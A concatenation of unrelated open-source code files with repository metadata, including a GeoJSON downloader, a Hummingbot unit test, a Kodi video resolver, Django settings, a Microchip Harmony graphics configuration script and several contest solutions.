    """True when both vertical sides of the square (columns c and c+l) match."""
    for i in range(l + 1):
        if image[r + i][c + l] != color or image[r + i][c] != color:
            return False
    return True
def paralleli(image, r, c, l, color):
    """True when both horizontal sides of the square (rows r and r+l) match."""
    for i in range(l + 1):
        if image[r + l][c + i] != color or image[r][c + i] != color:
            return False
    return True
"a.sterbini@gmail.com"
] | a.sterbini@gmail.com |
f4b6fb07afe16236f8d8856add56e78b27adbdd7 | b1adf2e06de52417119c1b6a150739533e9634a9 | /tools/geojson_simplifier/download.py | 67817408fefc638890c34429b23d360d37cbd78d | [
"Apache-2.0"
] | permissive | tjann/website | 5fadc61c86418d7beed7efe25e55ba2e8320cab4 | 0a4d41f157632324437305ba66b4f0ee8e54df00 | refs/heads/master | 2023-04-01T23:21:24.396459 | 2020-11-25T22:27:27 | 2020-11-25T22:27:27 | 301,866,316 | 0 | 0 | Apache-2.0 | 2020-10-06T22:09:37 | 2020-10-06T22:09:36 | null | UTF-8 | Python | false | false | 4,657 | py | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Downloads and saves GeoJson map files from DataCommons.
Typical usage:
python3 download.py
"""
import datacommons as dc
import geojson
# TODO(fpernice-google): Support downloading more than just US states.
class GeojsonDownloader:
    """Fetches GeoJSON boundaries from the Data Commons knowledge graph.

    After ``download_data`` runs, ``geojsons`` maps every child place id
    (e.g. "geoId/01") to the list of ``geoJsonCoordinates`` property
    values returned by Data Commons -- one JSON string per place.
    """

    # Maps a place type to the type of the places one administrative
    # level below it.
    LEVEL_MAP = {
        "Country": "AdministrativeArea1",
        "AdministrativeArea1": "AdministrativeArea2",
        "AdministrativeArea2": "City"
    }

    def __init__(self):
        dc.set_api_key('dev')
        self.geojsons = None

    def download_data(self, place='country/USA'):
        """Download the GeoJSONs of all places one level below *place*.

        For example, place='country/USA' fetches every US state
        (AdministrativeArea1) boundary.
        """
        place_types = dc.get_property_values([place], "typeOf")
        # The API nests the type inside a one-element list; unwrap it.
        assert len(place_types[place]) == 1
        place_type = place_types[place][0]
        children = dc.get_places_in([place], self.LEVEL_MAP[place_type])[place]
        self.geojsons = dc.get_property_values(children, "geoJsonCoordinates")

    def save(self, prefix='', path='./original-data/'):
        """Write each downloaded GeoJSON to *path* as <prefix><geoid>.geojson."""
        for geoid, values in self.geojsons.items():
            assert len(values) == 1
            filename = prefix + geoid.replace('/', '-') + '.geojson'
            with open(path + filename, 'w') as out:
                geojson.dump(geojson.loads(values[0]), out)
if __name__ == '__main__':
    # Script entry point: fetch the default place set and write it to disk.
    downloader = GeojsonDownloader()
    downloader.download_data()
    downloader.save()
| [
"noreply@github.com"
] | tjann.noreply@github.com |
54c12ac707d0fb9f3034bafa6706d3b24fb2c777 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_inaugurates.py | 7de12e81b92bba657d8dbf9875af9f14f3716b76 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py |
#class header
class _INAUGURATES():
def __init__(self,):
self.name = "INAUGURATES"
self.definitions = inaugurate
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['inaugurate']
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
8fd79fcb1629b053b15ec3b50f90f913cea4dd13 | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2/poroussel/pancakes | 5c6939bca7de41d39bd719fa3b49cb1a7017af13 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 548 | #!/usr/bin/env python
import fileinput
def resolve(pancakes):
    """Return the minimum number of flips to make every pancake happy-side up.

    `pancakes` is a list of '+' (happy) / '-' (blank) characters, top of the
    stack first.  Trailing '+' pancakes are already correct and are dropped;
    the answer is then the number of maximal runs that remain.  The input
    list is consumed (trailing elements are popped).

    BUG FIX: the original crashed with IndexError on an all-'+' stack (and
    on an empty list) because it popped past the start of the list; the
    emptiness guard now lives in the loop condition.
    """
    while pancakes and pancakes[-1] == '+':
        pancakes.pop()
    if not pancakes:
        return 0
    num = 1
    last = pancakes[0]
    for p in pancakes[1:]:
        if p != last:
            num += 1
            last = p
    return num
if __name__ == "__main__":
    # Code Jam driver (Python 2): the first input line is the number of
    # test cases, each following line is one stack of pancakes.
    input = fileinput.input()  # NOTE(review): shadows the builtin `input`
    nbtst = int(input.readline())
    for idx in range(nbtst):
        pancakes = list(input.readline().strip('\n'))
        print 'Case #{}: {}'.format(idx+1, resolve(pancakes))
| [
"[dhuo@tcd.ie]"
] | [dhuo@tcd.ie] | |
ee0b0649a0153943aa926fb5b3951b59399eba96 | 3e8352f1523f5cc1982a41a9e2f655ebda7e58ad | /test/hummingbot/client/command/test_balance_command.py | 1d85c6a462be9e1fbec811d3bdae6a533f44ee33 | [
"Apache-2.0"
] | permissive | matthewbackhouse/hummingbot | a159bfa7d94c3b2c9b3549e4bc304253c4a42791 | 9023822744202624fad276b326cc999b72048d67 | refs/heads/master | 2023-09-03T03:03:18.354741 | 2021-11-02T05:16:59 | 2021-11-02T05:16:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,789 | py | import asyncio
import unittest
from copy import deepcopy
from typing import Awaitable
from unittest.mock import patch, MagicMock
from hummingbot.client.config.global_config_map import global_config_map
from hummingbot.client.hummingbot_application import HummingbotApplication
from test.mock.mock_cli import CLIMockingAssistant
class BalanceCommandTest(unittest.TestCase):
    """Unit tests for HummingbotApplication's `balance` command behaviour."""
    @patch("hummingbot.core.utils.trading_pair_fetcher.TradingPairFetcher")
    def setUp(self, _: MagicMock) -> None:
        super().setUp()
        self.ev_loop = asyncio.get_event_loop()
        self.app = HummingbotApplication()
        # Drive the CLI through a mock so no real terminal is required.
        self.cli_mock_assistant = CLIMockingAssistant(self.app.app)
        self.cli_mock_assistant.start()
        # Snapshot the global config so each test may mutate it freely.
        self.global_config_backup = deepcopy(global_config_map)
    def tearDown(self) -> None:
        self.cli_mock_assistant.stop()
        self.reset_global_config()
        super().tearDown()
    def reset_global_config(self):
        # Restore every config entry captured in setUp.
        for key, value in self.global_config_backup.items():
            global_config_map[key] = value
    @staticmethod
    def get_async_sleep_fn(delay: float):
        # Build an async stub that ignores its arguments and just sleeps,
        # used to simulate a slow network call.
        async def async_sleep(*_, **__):
            await asyncio.sleep(delay)
        return async_sleep
    def async_run_with_timeout(self, coroutine: Awaitable, timeout: float = 1):
        ret = self.ev_loop.run_until_complete(asyncio.wait_for(coroutine, timeout))
        return ret
    def async_run_with_timeout_coroutine_must_raise_timeout(self, coroutine: Awaitable, timeout: float = 1):
        # Run `coroutine` and *require* it to raise asyncio.TimeoutError
        # itself: that error is captured as DesiredError and re-raised as
        # TimeoutError.  If instead the outer runner's timeout fires, the
        # coroutine never timed out on its own -> RuntimeError.
        class DesiredError(Exception):
            pass
        async def run_coro_that_raises(coro: Awaitable):
            try:
                await coro
            except asyncio.TimeoutError:
                raise DesiredError
        try:
            self.async_run_with_timeout(run_coro_that_raises(coroutine), timeout)
        except DesiredError:  # the coroutine raised an asyncio.TimeoutError as expected
            raise asyncio.TimeoutError
        except asyncio.TimeoutError:  # the coroutine did not finish on time
            raise RuntimeError
    @patch("hummingbot.user.user_balances.UserBalances.all_balances_all_exchanges")
    def test_show_balances_handles_network_timeouts(
        self, all_balances_all_exchanges_mock
    ):
        # Make the balance fetch slower than the configured command timeout.
        all_balances_all_exchanges_mock.side_effect = self.get_async_sleep_fn(delay=0.02)
        global_config_map["other_commands_timeout"].value = 0.01
        with self.assertRaises(asyncio.TimeoutError):
            self.async_run_with_timeout_coroutine_must_raise_timeout(self.app.show_balances())
        self.assertTrue(
            self.cli_mock_assistant.check_log_called_with(
                msg="\nA network error prevented the balances to update. See logs for more details."
            )
        )
| [
"petioptrv@icloud.com"
] | petioptrv@icloud.com |
fa1d8f93970ac77ce82fb5918674f2d1f937b0d5 | 2a3606551a4d850a7b4d6a4e08089c51108ef7be | /script.mrknow.urlresolver/lib/urlresolver9/plugins/vidmad.py | ed863f4b84cd7ed1da2688e61c60efbc0f68e9f3 | [
"GPL-2.0-only",
"Apache-2.0"
] | permissive | rrosajp/filmkodi | a6bb1823f4ed45453c8b8e54ffbd6a7b49f44450 | 0162cde9ae25ddbf4a69330948714833ff2f78c9 | refs/heads/master | 2021-09-18T06:03:17.561062 | 2018-06-22T23:28:53 | 2018-06-22T23:28:53 | 234,768,781 | 1 | 0 | Apache-2.0 | 2021-06-03T20:33:07 | 2020-01-18T17:11:57 | null | UTF-8 | Python | false | false | 1,745 | py | '''
urlresolver Kodi plugin
Copyright (C) 2016 Gujal
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from lib import helpers
from urlresolver9 import common
from urlresolver9.resolver import UrlResolver, ResolverError
class VidMadResolver(UrlResolver):
    """Resolver plugin for videos hosted on vidmad.net / tamildrive.com."""
    name = "vidmad.net"
    domains = ["vidmad.net", "tamildrive.com"]
    pattern = '(?://|\.)((?:vidmad|tamildrive)\.(?:net|com))/(?:embed-)?([0-9a-zA-Z]+)'

    def __init__(self):
        self.net = common.Net()

    def get_media_url(self, host, media_id):
        """Fetch the embed page and return a playable stream URL."""
        page_url = self.get_url(host, media_id)
        headers = {'User-Agent': common.FF_USER_AGENT}
        html = self.net.http_GET(page_url, headers=headers).content
        # The site serves error pages instead of HTTP error codes.
        if 'Not Found' in html:
            raise ResolverError('File Removed')
        if 'Video is processing' in html:
            raise ResolverError('File still being processed')
        sources = helpers.scrape_sources(html)
        return helpers.pick_source(sources) + helpers.append_headers(headers)

    def get_url(self, host, media_id):
        return self._default_get_url(host, media_id)
| [
"mrknow@interia.pl"
] | mrknow@interia.pl |
def fruits(seq):
    """Generator yielding each element of *seq* rendered via '%s' formatting."""
    for item in seq:
        yield '%s' % item
# Consume the generator manually first, then with a for loop.
f = fruits(["Apple", "Orange", "Mango", "Banana"])
print("The list of fruits is:")
for _ in range(4):
    print(next(f))
f = fruits(["Apple", "Orange", "Mango", "Banana"])
print("The list of fruits is:")
for x in f:
    print(x)
| [
"neillhenning@gmail.com"
] | neillhenning@gmail.com |
ef21d236fe9887c6a043c2e2b8b071947d54c588 | 7ec92031e28b1a92a10a9f252f99211663e0d8f9 | /src/py/l0893.py | 7f22bf16ff81b31efaa612c67eff54c34c57752b | [] | no_license | SS4G/leetcode_2020 | 4eb63f6afd59f84e44334e78cb06c7b33a89dd15 | 9a9a8fc779e7456db77f88e7dcdcc1f5cae92c62 | refs/heads/master | 2020-06-29T17:12:39.488350 | 2020-02-08T01:07:08 | 2020-02-08T01:07:08 | 200,575,620 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 993 | py | from collections import defaultdict
class SpecialEqual:
    """Canonical signature of a string under special-equivalence (LC 893).

    Two strings are special-equivalent when swapping characters among even
    indices and among odd indices can make them equal, so the multiset of
    even-index characters plus the multiset of odd-index characters is a
    complete invariant.
    """

    def __init__(self, str0):
        self.oddCharSet = defaultdict(lambda: 0)
        self.evenCharSet = defaultdict(lambda: 0)
        for idx, ch in enumerate(str0):
            if idx & 1:
                self.oddCharSet[ch] += 1
            else:
                self.evenCharSet[ch] += 1
        # BUG FIX: this assignment was commented out, so instances never had
        # a .hashKey attribute even though callers read it.
        self.hashKey = self.getHashKey()

    def getHashKey(self):
        """Return a hashable (even-counts, odd-counts) signature.

        BUG FIX: the original returned a pair of lists, which cannot be used
        as a dict/set key; sorted tuples are hashable and order-stable.
        """
        even = tuple(sorted(self.evenCharSet.items()))
        odd = tuple(sorted(self.oddCharSet.items()))
        return (even, odd)
class Solution(object):
    def numSpecialEquivGroups(self, A):
        """Count groups of special-equivalent strings (LeetCode 893).

        :type A: List[str]
        :rtype: int

        BUG FIX: the original read ``se.hashKey`` -- an attribute that was
        never set (AttributeError) -- and the key it meant to use was an
        unhashable pair of lists.  The invariant is now computed directly
        as a hashable pair of sorted character tuples (even indices, odd
        indices); counting distinct signatures counts the groups.
        """
        signatures = set()
        for s in A:
            signatures.add((tuple(sorted(s[::2])), tuple(sorted(s[1::2]))))
        return len(signatures)
if __name__ == "__main__":
    pass  # no standalone driver; the classes above are exercised by the judge
| [
"zihengs@opera.com"
] | zihengs@opera.com |
269a9583ed02424a432d30fb8e2324113b3155e9 | b948da1493329127a9a9ab567bae874c8cfa0bf4 | /portfolio/settings.py | d14137d7fde4fba7b1ae45b948c24066d3adef5c | [] | no_license | Kotodian/portfolio | edb93bec72d66d1fececd71b67a8e7f92cebb260 | 5661bf5d8134bbb576b2ea771fe5a6210c942feb | refs/heads/master | 2020-06-13T02:32:59.356331 | 2019-07-04T08:22:28 | 2019-07-04T08:24:22 | 194,503,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,511 | py | """
Django settings for portfolio project.
Generated by 'django-admin startproject' using Django 2.0.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the key is committed to source control; rotate it and load
# it from the environment before deploying.
SECRET_KEY = 's@281miy&cizve+fkz*ppmfm2$$qtk_2&*jqv@fr082ng=v!w('
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# NOTE(review): '*' accepts any Host header -- restrict to the real
# domain(s) in production.
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
    # My apps (local to this project)
    'gallery.apps.GalleryConfig',
    'blog.apps.BlogConfig'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'portfolio.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR,'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'portfolio.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.0/howto/static-files/
# Extra locations searched by collectstatic and the dev server.
STATICFILES_DIRS=[
    os.path.join(BASE_DIR,'static')
]
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
# User-uploaded media files.
MEDIA_URL='/media/'
MEDIA_ROOT=os.path.join(BASE_DIR,'media')
| [
"root@vultr.guest"
] | root@vultr.guest |
092b4f51337ff6d474d15c92a99205d86476b0e0 | 63b997a325ccd3a0d50eed68acb260dba0d9ddbc | /solution 1.py | 848ce35f44cfeef22118bb38b46ae345a1120b3f | [] | no_license | GLAU-TND/python-programming-assignment-2-anshika123456 | 238c8f78f09192f731b395313acecdc70bad3b11 | 2892ed91b5e0cab7d00cf349129b5746cb6eaf03 | refs/heads/master | 2021-01-13T22:45:16.969806 | 2020-02-23T17:38:17 | 2020-02-23T17:38:17 | 242,518,558 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | n=eval(input())
a=[]
p=n[0][-1]
a.append(n[0])
n=n[1:]
for j in n:
for i in n:
if p==i[0] and i not in a:
a.append(i)
p=i[-1]
print(a)
| [
"noreply@github.com"
] | GLAU-TND.noreply@github.com |
fa525dc7c9ab05eb28f373dd7d92e1e7c26dc407 | 0f5f6ff75cef3e81419216ba0191bb69a26c9068 | /hackerank/stat/wmean.py | 4fba60a0e2fa733e6d25f1ea4c30d0b972482be5 | [] | no_license | daddyawesome/CodingP | 1c7bbb2edd30333f7cb1b78ec6a0428854c4fa2b | 66ab4e452c23f3f770d6ad1e32f604c65e1dcbd3 | refs/heads/master | 2022-10-13T18:36:23.068195 | 2022-10-04T07:01:58 | 2022-10-04T07:01:58 | 220,047,911 | 0 | 0 | null | 2020-07-07T20:49:07 | 2019-11-06T17:01:44 | Python | UTF-8 | Python | false | false | 390 | py | '''
Weighted Mean
'''
n = input()
elements = input()
weights = input()
elements = elements.split(' ')
weights = weights.split(' ')
numerator = 0
denominator = 0
for i in range(0, len(elements)):
numerator = numerator + int(weights[i]) * int(elements[i])
denominator = denominator + int(weights[i])
weighted_mean = numerator / float(denominator)
print(round(weighted_mean, 1))
| [
"sablay296@gmail.com"
] | sablay296@gmail.com |
a501a6377f6fd1a8cf8077ad539dbf88ce6b8c96 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03626/s769192318.py | 659f9e7bc552bd622370f1ebcadc9cd3dcf92378 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 516 | py | mod = 1000000007
n = int(input())
s1 = input()
s2 = input()
ans = 1
for i in range(n):
if s1[i] == s2[i]:
if i==0:
ans *= 3
else:
if s1[i-1]==s2[i-1]:
ans *= 2
else:
continue
else:
if i==0:
ans *= 6
else:
if s1[i] == s1[i-1]:
continue
elif s1[i-1] == s2[i-1]:
ans *=2
else:
ans *= 3
ans = ans%mod
print(ans) | [
"66529651+Aastha2104@users.noreply.github.com"
] | 66529651+Aastha2104@users.noreply.github.com |
54ef31def53b0ce31a1fa0cf49cb09a862d4173e | bf460178162ada0dff219808ebcb6909d2118c0b | /0x11-python-network_1/8-json_api.py | f14ad6ccaabd85d773455006210295e0a3cced71 | [] | no_license | dario-castano/holbertonschool-higher_level_programming | b273d53da01eaa13aafcfef49a84cf4504e15795 | b509695dc898bf31dfb8cc4f82c4bdfdb8407cae | refs/heads/master | 2023-08-10T17:15:27.232508 | 2020-02-13T14:42:17 | 2020-02-13T14:42:17 | 207,344,442 | 0 | 0 | null | 2023-07-22T15:46:03 | 2019-09-09T15:39:58 | Python | UTF-8 | Python | false | false | 585 | py | #!/usr/bin/python3
"""
Python script that takes in a URL, sends a request to the URL
and displays the body of the response.
"""
import sys
import requests
if __name__ == "__main__":
data = {"q": sys.argv[1] if sys.argv.__len__() >= 2 else ""}
url = 'http://0.0.0.0:5000/search_user'
response = requests.post(url, data)
try:
json_data = response.json()
if not json_data:
print('No result')
else:
print('[{}] {}'.format(json_data.get('id'), json_data.get('name')))
except ValueError:
print('Not a valid JSON')
| [
"dario.castano@aim.com"
] | dario.castano@aim.com |
fdfd1fdd521757e153615bc1f421caef78c1123e | 0fd66a4a28bdc7d967ec18d90eca5cc54b5cbdd4 | /middleware/legato/templates/legato_gfx_mxt_cpro/legato_gfx_mxt_cpro.py | b8df421ed62d583c03dbef0bf18cd7bf19b1b356 | [
"LicenseRef-scancode-unknown-license-reference",
"ISC",
"LicenseRef-scancode-public-domain"
] | permissive | fb321/gfx | b865539ea6acd9c99d11a3968424ae03b5dea438 | e59a8d65ef77d4b017fdc523305d4d29a066d92a | refs/heads/master | 2020-06-27T14:20:24.209933 | 2019-07-31T22:01:05 | 2019-07-31T22:01:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,346 | py | # coding: utf-8
##############################################################################
# Copyright (C) 2018 Microchip Technology Inc. and its subsidiaries.
#
# Subject to your compliance with these terms, you may use Microchip software
# and any derivatives exclusively with Microchip products. It is your
# responsibility to comply with third party license terms applicable to your
# use of third party software (including open source software) that may
# accompany Microchip software.
#
# THIS SOFTWARE IS SUPPLIED BY MICROCHIP "AS IS". NO WARRANTIES, WHETHER
# EXPRESS, IMPLIED OR STATUTORY, APPLY TO THIS SOFTWARE, INCLUDING ANY IMPLIED
# WARRANTIES OF NON-INFRINGEMENT, MERCHANTABILITY, AND FITNESS FOR A
# PARTICULAR PURPOSE.
#
# IN NO EVENT WILL MICROCHIP BE LIABLE FOR ANY INDIRECT, SPECIAL, PUNITIVE,
# INCIDENTAL OR CONSEQUENTIAL LOSS, DAMAGE, COST OR EXPENSE OF ANY KIND
# WHATSOEVER RELATED TO THE SOFTWARE, HOWEVER CAUSED, EVEN IF MICROCHIP HAS
# BEEN ADVISED OF THE POSSIBILITY OR THE DAMAGES ARE FORESEEABLE. TO THE
# FULLEST EXTENT ALLOWED BY LAW, MICROCHIP'S TOTAL LIABILITY ON ALL CLAIMS IN
# ANY WAY RELATED TO THIS SOFTWARE WILL NOT EXCEED THE AMOUNT OF FEES, IF ANY,
# THAT YOU HAVE PAID DIRECTLY TO MICROCHIP FOR THIS SOFTWARE.
##############################################################################
componentsIDTable = ["HarmonyCore", "gfx_legato", "gfx_disp_mxt_cpro_320x480", "le_gfx_driver_ili9488", "sys_input", "gfx_maxtouch_controller"]
autoConnectTable = [["le_gfx_driver_ili9488", "Graphics Display", "gfx_disp_mxt_cpro_320x480", "gfx_display"],
["gfx_legato", "gfx_driver", "le_gfx_driver_ili9488", "gfx_driver_ili9488"],
["gfx_maxtouch_controller", "touch_panel", "gfx_disp_mxt_cpro_320x480", "touch_panel"]]
deactivateIDTable = ["FreeRTOS"]
execfile(Module.getPath() + "../common/pin_config.py")
execfile(Module.getPath() + "../common/bsp_utils.py")
execfile(Module.getPath() + "../common/display_utils.py")
pinConfigureFxn = configurePins
pinResetFxn = resetPins
#Add BSP support
execfile(Module.getPath() + "Support_BSP_SAM_E54_Curiosity_Ultra.py")
def enableConfigPins(bspID, configID, enable):
    """Apply (enable=True) or reset the pin configuration of a BSP config."""
    global pinConfigureFxn
    if (enable == True):
        print("enableCOnfig " + configID)
    else:
        print("disableCOnfig " + configID)
    pinConfig = getBSPSupportNode(bspID, configID).getPinConfig()
    applyFxn = pinConfigureFxn if (enable == True) else pinResetFxn
    applyFxn(pinConfig)
def enableConfig(bspID, configID, enable):
    # Activate/deactivate the Harmony components tied to a BSP support
    # configuration, wire their dependencies, fire the config's event
    # callback, then apply/reset the pin configuration.
    componentIDTable = getBSPSupportNode(bspID, configID).getComponentActivateList()
    deactivateIDTable = getBSPSupportNode(bspID, configID).getComponentDeactivateList()
    autoConnectTable = getBSPSupportNode(bspID, configID).getComponentAutoConnectList()
    if (enable == True):
        if (componentIDTable != None):
            res = Database.activateComponents(componentIDTable)
        if (deactivateIDTable != None):
            res = Database.deactivateComponents(deactivateIDTable)
        if (autoConnectTable != None):
            res = Database.connectDependencies(autoConnectTable)
        try:
            getBSPSupportNode(bspID, configID).getEventCallbackFxn()("configure")
        except:  # NOTE(review): bare except hides real errors -- narrow if possible
            print("No event callback for " + bspID + " configID.")
    elif (enable == False):
        if (componentIDTable != None):
            res = Database.deactivateComponents(componentIDTable)
        try:
            getBSPSupportNode(bspID, configID).getEventCallbackFxn()("unconfigure")
        except:  # NOTE(review): bare except hides real errors -- narrow if possible
            print("No event callback for " + bspID + " configID.")
    enableConfigPins(bspID, configID, enable)
def configureDisplayInterface(bspID, interface):
    # Activate the support configuration for `interface` on the given BSP,
    # deactivating every other known display interface first.
    print("Configuring for " + str(interface) + " Interface.")
    if (bspID == None):
        print("No BSP used, will not configure")
    else:
        DisplayInterfaceList = getDisplayInterfaces(bspID)
        if (DisplayInterfaceList != None):
            if (str(interface) in DisplayInterfaceList):
                for val in DisplayInterfaceList:
                    if (val != interface):
                        enableConfig(bspID, val, False)
                enableConfig(bspID, interface, True)
            else:
                print(str(interface) + " display interface is not supported.")
def onDisplayInterfaceSelected(interfaceSelected, event):
    """Symbol-change callback: record the new interface and reconfigure.

    Fix: dropped an unused local that re-read "currDisplayInterface" just
    before the same symbol was overwritten.
    """
    bspID = getSupportedBSP()
    newDisplayInterface = interfaceSelected.getComponent().getSymbolByID("DisplayInterface").getValue()
    # Keep the shadow symbol in sync with the user's selection.
    interfaceSelected.getComponent().getSymbolByID("currDisplayInterface").setValue(event["value"], 0)
    configureDisplayInterface(bspID, str(newDisplayInterface))
def instantiateComponent(templateComponent):
    # MPLAB Harmony entry point: create the template's symbols, activate the
    # required graphics components and, when a supported BSP is present,
    # select its default display interface.
    global componentsIDTable
    global autoConnectTable
    global supportedBSPsIDList
    #Check if a supported BSP is loaded
    bspUsedKeyID = getSupportedBSP()
    DisplayInterfaceList = getDisplayInterfaces(bspUsedKeyID)
    #if there is no list, build the list from the interfaces for each supported BSP
    if (DisplayInterfaceList == None):
        DisplayInterfaceList = []
        bspSupportedList = getSupportedBSPList()
        for bsp in bspSupportedList:
            DisplayInterfaceList += getDisplayInterfaces(bsp)
        # Remove duplicates
        DisplayInterfaceList = list(dict.fromkeys(DisplayInterfaceList))
    DisplayInterface = templateComponent.createComboSymbol("DisplayInterface", None, DisplayInterfaceList)
    DisplayInterface.setLabel("Display Interface")
    DisplayInterface.setDescription("Configures the display controller interface to the maXTouch Curiosity Pro.")
    DisplayInterface.setDependencies(onDisplayInterfaceSelected, ["DisplayInterface"])
    DisplayInterface.setVisible(True)
    # Shadow display interface symbol
    currDisplayInterface = templateComponent.createComboSymbol("currDisplayInterface", None, DisplayInterfaceList)
    currDisplayInterface.setVisible(False)
    res = Database.activateComponents(componentsIDTable)
    res = Database.connectDependencies(autoConnectTable)
    res = Database.deactivateComponents(deactivateIDTable);
    if (bspUsedKeyID != None):
        DisplayInterface.setDefaultValue(getDefaultDisplayInterface(bspUsedKeyID))
        currDisplayInterface.setDefaultValue(getDefaultDisplayInterface(bspUsedKeyID))
        configureDisplayInterface(bspUsedKeyID, str(currDisplayInterface.getValue()))
    else:
        print("No BSP used, only software components are configured. Please add board-specific components.")
| [
"http://support.microchip.com"
] | http://support.microchip.com |
c32cacad1c1141e9755e500443ac092c49f4da39 | ece5f5355fd3c76af49e4912ceffade563617dae | /src/scripts/examples/extract_data.py | ce17dac6c330a9725fab5b778709fe6ad52497a9 | [
"MIT"
] | permissive | stevenchen0x01/binwalk | 5f1f3d79a0427e70858c8454f60fd46d5a82dbd1 | 023a25e1222cd4209d120bd752aa5c55e621ed2a | refs/heads/master | 2021-01-19T16:41:47.397994 | 2017-08-21T17:45:43 | 2017-08-21T17:45:43 | 101,019,328 | 1 | 0 | null | 2017-08-22T03:57:23 | 2017-08-22T03:57:23 | null | UTF-8 | Python | false | false | 839 | py | #!/usr/bin/env python
import sys
import binwalk
# Extracts and logs
# Scan each CLI target with extraction enabled, then report every result
# whose offset produced an extracted artifact (Python 2: dict.has_key).
for module in binwalk.scan(*sys.argv[1:], signature=True, quiet=True, extract=True):
    print ("%s Results:" % module.name)
    for result in module.results:
        if module.extractor.output.has_key(result.file.path):
            if module.extractor.output[result.file.path].extracted.has_key(result.offset):
                print (
                    "Extracted '%s' at offset 0x%X from '%s' to '%s'" % (result.description.split(',')[0],
                    result.offset,
                    result.file.path,
                    str(module.extractor.output[result.file.path].extracted[result.offset])))
| [
"heffnercj@gmail.com"
] | heffnercj@gmail.com |
